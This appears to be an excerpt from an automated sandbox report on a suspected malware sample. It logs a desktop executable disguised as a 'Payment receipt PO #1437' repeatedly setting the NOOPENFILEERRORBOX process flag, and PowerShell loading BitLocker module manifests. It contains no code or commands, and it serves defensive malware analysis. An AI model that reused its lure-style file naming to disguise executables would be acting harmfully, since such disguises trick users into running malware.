Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
